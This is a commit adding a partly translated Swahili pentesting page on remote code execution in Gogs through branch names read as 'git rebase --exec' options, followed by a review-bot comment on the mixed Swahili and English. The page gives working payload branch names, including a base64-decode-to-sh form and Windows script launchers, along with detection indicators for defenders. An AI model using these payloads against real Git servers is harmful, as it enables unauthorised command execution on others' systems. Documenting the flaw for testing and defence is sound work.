Translated ['src/pentesting-ci-cd/gogs-security/README.md'] to sw

This commit is contained in:
Translator
2026-06-05 13:57:22 +00:00
parent 86c040ecbe
commit b0f4115e6a
@@ -0,0 +1,103 @@
# Gogs Security
{{#include ../../banners/hacktricks-training.md}}
## Gogs ni nini
**Gogs** ni **huduma ya Git nyepesi inayojihost** iliyoandikwa kwa Go. Kutoka kwa mtazamo wa mshambuliaji, ichukulie kama **jukwaa la host ya Git la watumiaji wengi** ambapo mtumiaji mwenye ruhusa ya chini bado anaweza kudhibiti majina ya branch, pull requests, webhooks, tokens, na mipangilio ya repository.
## Git option injection kupitia refs / majina ya branch
Kama application inapita **ref name** inayodhibitiwa na mshambuliaji moja kwa moja kwa Git command **bila `--` au `--end-of-options`**, branch inayoanza na `--` inaweza kuchambuliwa kama **Git option** badala ya data.
Muundo wa kawaida wa hatari:
```bash
git <subcommand> <user-controlled-ref>
```
Muundo salama zaidi unaotarajiwa katika code ya kujihami:
```bash
git <subcommand> -- <user-controlled-ref>
# or
git <subcommand> --end-of-options <user-controlled-ref>
```
Dhana potofu la kawaida ni kwamba kuthibitisha ref kwa `git rev-parse --verify <ref>` kunatosha. **Sio**:
- mshambuliaji anaweza kwanza **kuunda branch halisi** whose name starts with `--`
- `rev-parse --verify` only checks that the ref resolves to an object
- a later unsafe Git invocation may still parse the same value as an **option**
Hii hugeuza feature yoyote ya Git-hosting inayotumia tena majina ya branch yaliyohifadhiwa kuwa primitive inayowezekana ya RCE.
## Kutumia vibaya `git rebase --exec` kwa RCE
`git rebase` supports `--exec=<cmd>`, which runs the command through `sh -c` after replaying commits. Therefore, if the base branch of a pull request reaches a call similar to:
```bash
git rebase --quiet <baseBranch> <headBranch>
```
na `<baseBranch>` inadhibitiwa na mshambuliaji, tawi kama:
```bash
--exec=touch${IFS}/tmp/rce_proof
```
inaweza kutafsiriwa kama **Git flag** badala ya jina la branch.
### Kwa nini `${IFS}` ni muhimu
Git refs haziwezi kuwa na spaces halisi, lakini shell expansion bado hutokea wakati Git inatekeleza `--exec` kupitia `sh -c`. `${IFS}` hupanuliwa kuwa whitespace wakati wa runtime, ikiruhusu payloads kama:
```bash
--exec=touch${IFS}/tmp/rce_proof
--exec=id${IFS}>/tmp/out
```
Kwa payloads zinazohitaji herufi zilizokatazwa na Git (`:`, `~`, `^`, `?`, `*`, `[`, `\\`, `//`), encode amri halisi na decode wakati wa execution:
```bash
--exec=echo${IFS}<base64_payload>|base64${IFS}-d|sh
```
## Windows-specific payload delivery
Kwenye Windows, inline payloads ziko na vizuizi zaidi kwa sababu Git huhifadhi branch refs kama files na NTFS hukataza characters kama `|` ndani ya filenames. Njia mbadala ya vitendo ni:
1. Commit payload script ndani ya repository (kwa mfano `.abcdef`)
2. Create a branch kama:
```bash
--exec=sh${IFS}.abcdef
```
Ikiwa Git for Windows inazindua payload kupitia **MSYS2 `sh`**, herufi za meta za PowerShell zinaweza kuharibika. Suluhisho la vitendo ni kuacha script iliyocommit iite:
```bash
cmd.exe //c .abcdef.bat
```
where `//c` ni umbo salama kwa MSYS2 la Windows `/c`.
## Matumizi mabaya ya state-machine ya Merge / PR
Unapojaribu majukwaa ya Git-hosting, usiangalie tu command ya mwisho yenye hatari. Pia kagua **njia za awali za uthibitishaji** na **ukaguzi wa nyuma unaorudiwa**.
Muundo mmoja muhimu wa exploitation ni:
1. Njia ya awali ya uthibitishaji hutumia flow ya clone/fetch **salama** yenye `--end-of-options`, hivyo branch hasidi hukubaliwa kama data
2. Pull request inakuwa **mergeable**
3. Njia ya baadaye ya merge au checkout hutumia tena jina la branch lililohifadhiwa ndani ya Git call **isiyo salama**
4. Code execution hutokea hata kama hatua ya baadaye inashindwa na UI kurudisha **HTTP 500**
Hii ina maana feature inaweza kuwa exploitable hata wakati merge ya mwisho inaishia kwenye error, na repository lengwa inaweza kuachwa katika hali ya **corrupted partial rebase state** baada ya payload tayari ku-run.
## Mawazo ya vitendo ya kuwinda
Unapochunguza Gogs instance au huduma nyingine ya Git kama hiyo, kagua:
- Majina ya branch yanayoanza na `--`
- Kushindwa kwa merge kunakohusisha `git checkout '--exec=...'`
- Pull requests zilizokwama kuwa mergeable hata ingawa uthibitishaji wa baadaye wa branch unashindwa
- Repositories zilizoachwa katika partial rebase / broken Git state baada ya merges kushindwa
- Helper files zisizotarajiwa zilizocommitted kwenye Windows payload paths (kwa mfano dotfiles pamoja na `.bat` launchers)
- Suspicious API tokens zilizoundwa muda mfupi kabla ya failed PR merges
Mfano wa log artifact:
```text
merge: git checkout '--exec=<...>': exit status 128 - error: unknown option `exec=<...>'
```
## Marejeo
- [Rapid7 - Authenticated RCE via Argument Injection in Gogs (NOT FIXED)](https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed)
- [Metasploit module PR for Gogs rebase argument injection](https://github.com/rapid7/metasploit-framework/pull/21515)
- [Git rebase documentation (`--exec`)](https://git-scm.com/docs/git-rebase)
{{#include ../../banners/hacktricks-training.md}}
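Review bot: The translation is incomplete and mixes languages within single passages of the new file: the bullet list under "Dhana potofu la kawaida" switches to English mid-sentence ("mshambuliaji anaweza kwanza **kuunda branch halisi** whose name starts with `--`", and the next two bullets are entirely English), the first paragraph of "Kutumia vibaya `git rebase --exec` kwa RCE" is untranslated, the heading "Windows-specific payload delivery", step "2. Create a branch kama:" and "where `//c` ni umbo salama..." are half English. Since the commit message claims the whole file was translated to sw, either finish translating those lines or split them out so the rendered page reads consistently in one language. Two smaller points in the same hunk: "Dhana potofu la kawaida" should agree as "Dhana potofu ya kawaida", and the forbidden-character list `\\` in inline code renders as two backslashes where Git's restriction is on a single `\`; consider `\` unless the source file deliberately escapes it for the mdBook include pipeline.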